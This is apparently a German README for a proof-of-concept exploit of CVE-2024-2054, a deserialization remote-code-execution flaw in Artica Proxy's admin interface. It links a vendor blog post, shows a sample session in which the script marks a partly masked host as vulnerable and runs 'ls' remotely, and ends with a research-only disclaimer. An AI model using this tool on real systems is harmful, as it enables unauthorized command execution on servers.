
Proof-of-Concept-Exploit für CVE-2024-2054, der unsichere Deserialisierung RCE in der administrativen Webanwendung Artica-Proxy demonstriert. Enthält Befehlsausführung und Schwachstellenverifizierung.
Ein Exploit-Proof-of-Concept für die administrative Webanwendung von ARTICA PROXY CVE-2024-2054
Weitere Details hier: https://blog.sonicwall.com/en-us/2024/03/unpatched-php-deserialization-vulnerability-in-artica-proxy/
$ python3 CVE-2024-2054.py
Enter url: https://8X.XX.XX.X4:9000
Vulnerable
enter command: ls
assets
index.html
wiz.upload.php
wiz.wizard.php
wiz.wizard.progress.php
Dieser POC wurde ausschließlich für akademische Forschungszwecke und die Entwicklung wirksamer Verteidigungstechniken erstellt und ist nicht dazu gedacht, Systeme anzugreifen, sofern dies nicht ausdrücklich autorisiert wurde. Die Projektentwickler und -betreuer sind nicht verantwortlich oder haftbar für Missbrauch der Software/des POC. Bitte verantwortungsvoll verwenden.